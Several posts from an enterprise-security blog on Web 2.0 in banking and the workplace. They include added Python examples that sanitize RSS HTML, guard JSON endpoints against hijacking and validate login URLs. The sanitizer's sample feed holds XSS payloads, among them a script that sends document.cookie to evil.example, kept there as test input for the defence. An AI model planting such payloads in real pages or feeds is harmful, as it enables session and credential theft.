Secure Enterprise 2.0 Blog

Making Sense of the Consumerized Workplace

Jul 28

Banking Web 2.0 a Reality in 2009 - Celent Report

Yonni Harif

What does your bank have in common with Facebook? Nothing spectacular just yet, but if the latest analyst report from Celent is right on the money, you will soon be able to pay that credit card bill or get a loan while chatting with your Facebook friends or checking the sports news on iGoogle.

That’s right, Web 2.0 is coming to your local bank, which makes a lot of sense for both banks and customers. Ever since online retail banking took off, the market has been saturated with similar, limited-capability websites, with little to differentiate one from another.

Meanwhile, customers want full control of their personal finances - to be able to access account information when, how and wherever they want to.

And so, as banks try to find meaningful ways to engage customers, tools such as an iGoogle or MyYahoo personal banking gadget will soon be available at your fingertips.

In fact, financial research firm Celent has recently issued a report on the state of Banking with Web 2.0, reaching some very interesting conclusions -

  • Web 2.0 banking is 12-18 months away - banks are already working out which technology to use to offer these tools to consumers, though much remains to be done, especially as the banking industry continues to experience a downturn.
  • Security is critical - a prerequisite for any financial institution adopting a new technology, and new technology brings emerging security issues with it. One industry forum tackling this problem is the Secure Enterprise 2.0 Forum.
  • Advanced banking web 2.0 tools to hit the market in late 2008 - which means that some vendors have already had a head start (shameless self-promotion).

(Get the full report here.)

So if Web 2.0 has anything to do with it, you’ll likely be reaching for your mouse, instead of your wallet, sooner than you know it.

May 22

Enterprise 2.0 - Good News and Bad News

Yonni Harif

eWEEK just came out with an interesting survey on how and why businesses are “diving into Web 2.0 Waters”.

Over half of survey respondents said their companies are allowing access to social networks at work. Granted, with a pool of some 282 IT professionals, we can’t claim victory just yet. But this is still an important indicator of how enterprises are gravitating towards social consumer technology.

There is good news and bad news that arise out of this survey:

Want the good news first? - When asked what are the drivers for implementing Web 2.0 tools at work, over 70 percent said they are looking for improved communications and collaboration internally and 49 percent said they are looking to reach consumers. In other words, Enterprise 2.0 tools (social networks, RSS, social bookmarking, blogs, etc) are becoming valid business tools.

The bad news? Wherever access is blocked, workers are using these tools unsanctioned by IT or management, putting enterprise data at risk. Nearly half of respondents revealed at least one rogue Web 2.0 app at their company. The security risks are considerable if companies do not provide a secure environment for their employees.

And how are companies dealing with the groundswell? Not very effectively. When asked whether their companies had implemented policies regulating the use of Web 2.0 technologies by employees, only 28 percent said yes.

So there is still much more work to be done, though the benefits of using Web 2.0 to get things done at work are already stepping into the limelight.

Apr 19

Block, Lock and Web 2.0 Smoking Barrels

Yuval Tarsi

With usage of public Web 2.0 services such as personalized homepages and social networks growing daily, these services become an increasingly significant tool in the information worker’s toolbox. They are used to network, collaborate, research and stay up-to-date on the latest news and trends.

At the same time, concern arises about the security risks involved. In many organizations, the knee-jerk reaction of the information security organization is “block out and lock down” – block the services at the web access layer and make sure all workstations are locked down.

Even if such locks and blocks could be implemented effectively, which is questionable, CISOs should reexamine whether such a strategy is best in the long term. Keeping the latest Web technologies out of the workplace can have a detrimental effect on productivity, as well as on employee morale and retention. Ultimately, organizations that decide to lock out the Web today may find themselves left behind.

All that said, the security challenges are real, and the intuitive reaction of many organizations is not unjustified. New technologies provide new capabilities but also present new risks, such as an employee publishing proprietary information on a public blog or using a public bookmarking site as a research tool. Other security breaches may be more elaborate and malicious in nature, such as phishing attempts or newer attacks against the Web technologies in use within the organization (e.g. JavaScript hijacking of JSON data responses, or script injection through the HTML carried in RSS feed items).
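
Script injection through RSS feeds, mentioned above, happens when a feed reader or homepage gadget drops the HTML from a feed item’s description straight into its own page. The following Python is an added example, not code from this post or from the Secure Enterprise 2.0 Forum: it parses a feed constructed for the example, with one benign item and one hostile one, and strips active content with an allowlist sanitizer before anything would be rendered. The feed contents, tag allowlist and helper names are assumptions made for the example.

```python
"""Strip active content from RSS item descriptions before rendering them.

Added example; not code from the original post. RSS <description> elements
routinely carry HTML, and a gadget that injects that HTML into its own page
unchanged executes whatever the feed author (or whoever tampered with the feed
in transit) put there. The sanitizer keeps a small allowlist of tags and
attributes and drops everything else, including event-handler attributes and
javascript: URLs. The feed below is constructed for the example.
"""
import xml.etree.ElementTree as ET
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Sample feed, constructed for the example: one benign item, one hostile one.
SAMPLE_FEED = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>Example Bank alerts</title>
<item><title>Statement ready</title>
<description><![CDATA[Your <b>March</b> statement is <a href="https://bank.example/stmt">online</a>.]]></description></item>
<item><title>Urgent notice</title>
<description><![CDATA[<script>document.location='https://evil.example/?c='+document.cookie</script>
<img src="x" onerror="alert(1)">Click <a href="javascript:steal()">here</a>
<a href="https://evil.example/login" style="position:absolute">to verify</a>]]></description></item>
</channel></rss>"""

ALLOWED_TAGS = {"a", "b", "i", "em", "strong", "p", "br", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href"}}          # every other attribute is dropped
SAFE_SCHEMES = {"http", "https", "mailto"}  # absolute URLs only; relative ones are dropped too


def _safe_url(url):
    """Allowlist the scheme; anything else (javascript:, data:, vbscript:) is rejected."""
    return urlsplit(url.strip()).scheme.lower() in SAFE_SCHEMES


class FeedHtmlSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip = 0  # depth inside <script>/<style>, whose text must not leak through

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
            return
        if self._skip or tag not in ALLOWED_TAGS:
            return  # drop the tag itself; its text children are still emitted, escaped
        kept = []
        for name, value in attrs:
            if name in ALLOWED_ATTRS.get(tag, ()) and value and _safe_url(value):
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip = max(0, self._skip - 1)
            return
        if not self._skip and tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            # convert_charrefs decoded entities; re-escape so text can never become markup
            self.out.append(escape(data, quote=False))


def sanitize_html(fragment):
    parser = FeedHtmlSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def safe_items(feed_xml):
    """Return (title, sanitized description HTML) for every item in the feed."""
    root = ET.fromstring(feed_xml)
    return [(item.findtext("title", ""), sanitize_html(item.findtext("description", "")))
            for item in root.iter("item")]


if __name__ == "__main__":
    for title, html in safe_items(SAMPLE_FEED):
        print(title, "->", repr(html))
```

The sanitizer deliberately keeps the hostile item’s link to evil.example with its text: an allowlist of markup decides what can execute, not where a link points, so a policy on link destinations (or a warning interstitial) is a separate control.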

For information security professionals, a balance needs to be struck between providing employees with the tools they need to be productive and maintaining sufficient control to keep security incidents at an acceptable level.

First and foremost, it is critical to define and implement clear use policies for Web 2.0 tools both inside and outside the organization.

In addition to defining policies, there are technical measures that can be taken to reduce the risk of using Web 2.0 technologies in the enterprise:

  • Place a middle tier between information back-end systems and Web 2.0 front-ends – Web 2.0 front-ends such as RSS and AJAX gadgets tend to generate many requests. It is therefore advisable to include a middle tier that is optimized for Web 2.0 front-ends and capable of communicating efficiently with back-ends.
  • Leverage existing security mechanisms – even when accessing data from Web 2.0 front ends, there is no reason not to leverage existing enterprise single-sign-on or centralized access management.
  • Provisioning is critical – maintain full control of application and data provisioning, regardless of how data is consumed or where applications run.
  • Address ‘Attacks 2.0’ from the get-go – train developers on the risks specific to Web 2.0 technologies and the accepted best practices to handle them.
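
JavaScript hijacking, named earlier in this post and covered by the ‘Attacks 2.0’ bullet above, works because a hostile page can include a logged-in user’s JSON endpoint with a script tag, the victim’s browser sends the request complete with session cookie, and a bare JSON array is also a valid JavaScript program whose values the attacker’s page could capture in browsers of the time. The following Python is an added example, not the Forum’s or any vendor’s code: it shows the two usual defences on the server side and the matching client-side unwrapping. The header name, prefix, payload and response shape are assumptions made for the example.

```python
"""Harden a JSON endpoint consumed by AJAX gadgets against JavaScript hijacking.

Added example; not code from the original post. Two defences are shown:

1. Refuse any request that a <script src> tag could have produced. A custom
   header such as X-Requested-With can only be set by XMLHttpRequest from the
   endpoint's own origin, so its absence marks a cross-site include.
2. Frame the body with a prefix that is a syntax error when executed as a
   script but trivial for the real client to strip before parsing.

Headers, payload and the endpoint shape are constructed for the example.
"""
import json

# Never valid JavaScript, so a <script src> include dies before evaluating the
# array; "while(1);" is another common choice.
ANTI_HIJACK_PREFIX = ")]}',\n"
REQUIRED_HEADER = ("x-requested-with", "XMLHttpRequest")


def build_json_response(request_headers, payload):
    """Return (status, response_headers, body) for a data request.

    Authentication is assumed to have happened already; this is only the
    anti-hijacking layer on top of it.
    """
    lowered = {name.lower(): value for name, value in request_headers.items()}
    name, expected = REQUIRED_HEADER
    if lowered.get(name) != expected:
        # A cross-origin <script src> include cannot add this header, so treat its
        # absence as a cross-site request rather than a call from our own gadget.
        return 403, {"Content-Type": "text/plain"}, "forbidden"
    body = ANTI_HIJACK_PREFIX + json.dumps(payload)
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",  # do not let the browser reinterpret the body
        "Cache-Control": "no-store",          # account data must not land in shared caches
    }
    return 200, headers, body


def parse_guarded_json(body):
    """What the legitimate XMLHttpRequest client does with the body."""
    if not body.startswith(ANTI_HIJACK_PREFIX):
        raise ValueError("response is not framed as expected; refusing to parse")
    return json.loads(body[len(ANTI_HIJACK_PREFIX):])


if __name__ == "__main__":
    accounts = [{"account": "...1234", "balance": 1250.75}]  # constructed sample data
    for hdrs in ({}, {"X-Requested-With": "XMLHttpRequest"}):
        status, _, body = build_json_response(hdrs, accounts)
        print(status, repr(body))
```

The header check relies on the browser refusing to let one origin add custom headers to a request for another; a request from a gadget hosted on a third-party homepage therefore has to go through the middle tier recommended above, which talks to the back-end from the bank’s own origin, rather than straight from the user’s browser to the bank.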

The benefits of using Web 2.0 tools in the enterprise are many, ranging from increased productivity to improved employee retention. As with all new technologies, with new capabilities come new risks. While mitigating these risks is challenging, preventing the use of such tools altogether is, in the long term, a much more risky strategy.

Yuval

Mar 20

E-Banking 2.0

Yuval Tarsi

E-Banking is great. It really is. I access my bank’s e-banking application at least a couple of times a month. I check my balance, look at the latest transactions, make sure the paycheck came in on time and then try to figure out where it all went…

I’ve been using e-banking for at least five years, and I recently realized, while trying to figure out the latest installment of ‘The Mystery of the Disappearing Dollars’, how little the experience has changed in those five years.

The Web has advanced tremendously and broadband Internet has led to an explosion of rich content, online voice and video communication, social networking, personalized home pages, gadgets, widgets, RSS and many other useful tools and services.

Yet, my e-banking application still shows the same balance and transactions page, lets me run the same queries, performs the same transfers and generates the same statements and reports. (It also shows a disturbingly consistent savings account balance, but that’s a different story).

Financial institutions, and commercial banks in particular, have always been conservative organizations, and rightfully so. We entrust them with our most valued assets. We expect them to safeguard those assets with prudence and diligence, and not hop onto any passing technological bandwagon just because it’s cool. But the Web 2.0 technologies I talk about can no longer be considered a passing fad. They have become ingrained in how we spend our time online, how we work and play, and slowly but surely, these technologies are making headway in the banking space.

Even today, if you search RSS and gadget directories you will find that some banks and related organizations are using Web 2.0 channels to stay in touch with customers and provide useful information (for instance, visit iGoogle, click on ‘add stuff’ and then search for ‘American Express’).

Now picture a gadget on your iGoogle page that lets you know at a glance what your credit card balance is and when your next payment is due, or an RSS feed that gets populated on the fly whenever your bank account is debited for an amount over $500. With the advent of tools that allow banks to deliver these types of services with the same level of security provided by existing e-banking applications, the widespread availability of such services is only a matter of time.

What does this mean for us? Well, for one thing, we’ll finally see a change in those good-old e-banking applications, and I’ll have one less thing to rant about, but more importantly, we’ll be able to access our banking information online where and when we want it, and take control over our finances. After all, I visit my e-banking site twice a month, but I visit iGoogle a dozen times a day.

Yuval

Mar 13

Top Ten Tips for Secure Enterprise Social Networking

David Lavenda

I am often asked how to best leverage the social networking world for business purposes and personal growth.  So I have put together a short list that sums up a few pointers to get you started on secure enterprise social networking:

  1. Set limits about what you are willing to expose about yourself and remember the context of the interaction (business or personal). Be wary, since embarrassing or inappropriate information about yourself may appear in contexts that you did not expect. It is very difficult to “clean up” your profile later on.
  2. Social networks are not just for play. Treat the network as a resource of valuable information, and tap into your colleagues’ expertise with the collaborative tools available on the network.
  3. Educate your social networking friends, and they will rely on you as a valuable resource. Incorporate news items, blog posts and interesting tidbits into the discussion. Social networks are all about sharing information with your friends and work colleagues. 
  4. Try to build a single “space” where all your friends meet – work, family, etc. Many of these contacts are more than just friends, co-workers or professional acquaintances anyway. Trying to work with multiple networking platforms makes life confusing and networking much harder.
  5. Do not spam your friends or network. Most social networking platforms have a sophisticated yet absolutely lethal mechanism to eradicate spammers or “unsolicited evangelists”. You can still talk about the issues that matter to you and engage friends and coworkers using the collaboration tools available on the network, without exploiting them.
  6. Word of advice - do not badmouth your company’s customers in an open discussion group. It is bound to bounce back and one day you may find a cardboard box with your name on it waiting on your desk. Be civilized in your discussions.
  7. Secret is not secured. Some social networks, like Facebook, allow users to engage in private or secret groups. Although these forums take place away from the public eye, a “secret” group is an access-control setting enforced by the platform, not encryption: the posts sit in clear on the provider’s servers, are readable by every member and by anyone who compromises a member’s account, and can be copied or forwarded at will. Treat them as unsuitable for confidential company information unless appropriate enterprise-grade safeguards have been put in place.
  8. When adding RSS feeds to a feed reader, always prefer to use a link you got from the content provider’s web site rather than from any third party (an email, an IM, a link on a social networking site etc.) This improves the likelihood that the information you are seeing is what the content provider intended.
  9. When entering your username and password on any site, first verify that the host name in the browser’s address bar really is the site you (think) you are accessing, and that the page is served over HTTPS. Read the whole host name: an address that merely begins with your bank’s name is not your bank. This is the simplest defence against a look-alike site set up to capture your password.
  10. Never enter your username and password on a page you reached by clicking a link in an email, IM message, third-party web site or social networking site; type the address or use your own bookmark instead. Such links are the tools phishers use most often to steal passwords.
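
Tip 9 asks you to compare the address bar with the site’s real address. A naive “does it contain my bank’s name” check is exactly what phishing URLs are built to pass, so the following Python, an added example and not the author’s code, shows what a careful comparison has to handle: the scheme, the user-info trick, suffix look-alikes and non-ASCII or punycode host names. The expected host and the sample URLs are constructed for the example, and the function is the kind of check a browser extension or a corporate proxy could apply, not something the tips list describes.

```python
"""Decide whether a login URL really belongs to the site the user expects.

Added example; not code from the original post. The expected host and the
sample URLs below are constructed for the example.
"""
from urllib.parse import urlsplit


def is_trusted_login_url(url, expected_host):
    """True only if url is HTTPS and its host is expected_host or a subdomain of it."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:          # e.g. malformed IPv6 literal
        return False
    if parts.scheme.lower() != "https":
        return False            # credentials over plain HTTP can be read on the wire
    # .hostname drops any user:pass@ part and the port, and lowercases the result
    host = (parts.hostname or "").rstrip(".").lower()
    if not host:
        return False
    if parts.username is not None:
        return False            # "https://bank.example@evil.example/" shows the bank's name first
    try:
        host.encode("ascii")
    except UnicodeEncodeError:
        return False            # look-alike non-ASCII letters in the host name
    if host.startswith("xn--") or ".xn--" in host:
        return False            # punycode-encoded IDN label; conservative, may be a homoglyph
    expected = expected_host.lower().rstrip(".")
    # Require an exact match or a genuine subdomain: "bank.example.evil.example"
    # ends in "evil.example", not ".bank.example", and is rejected.
    return host == expected or host.endswith("." + expected)


if __name__ == "__main__":
    # Constructed sample of the kinds of address a phishing link may carry.
    for candidate in (
        "https://online.bank.example/login",
        "http://online.bank.example/login",
        "https://bank.example.evil.example/login",
        "https://bank.example@evil.example/login",
        "https://bank-example.com/login",
        "https://b\u0430nk.example/login",       # Cyrillic a
    ):
        print(is_trusted_login_url(candidate, "bank.example"), candidate)
```

Rejecting every punycode label is stricter than a real browser, which only shows the raw `xn--` form when it judges the name to be mixed-script; for a check that guards one known bank host the strict rule is the safer default.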

David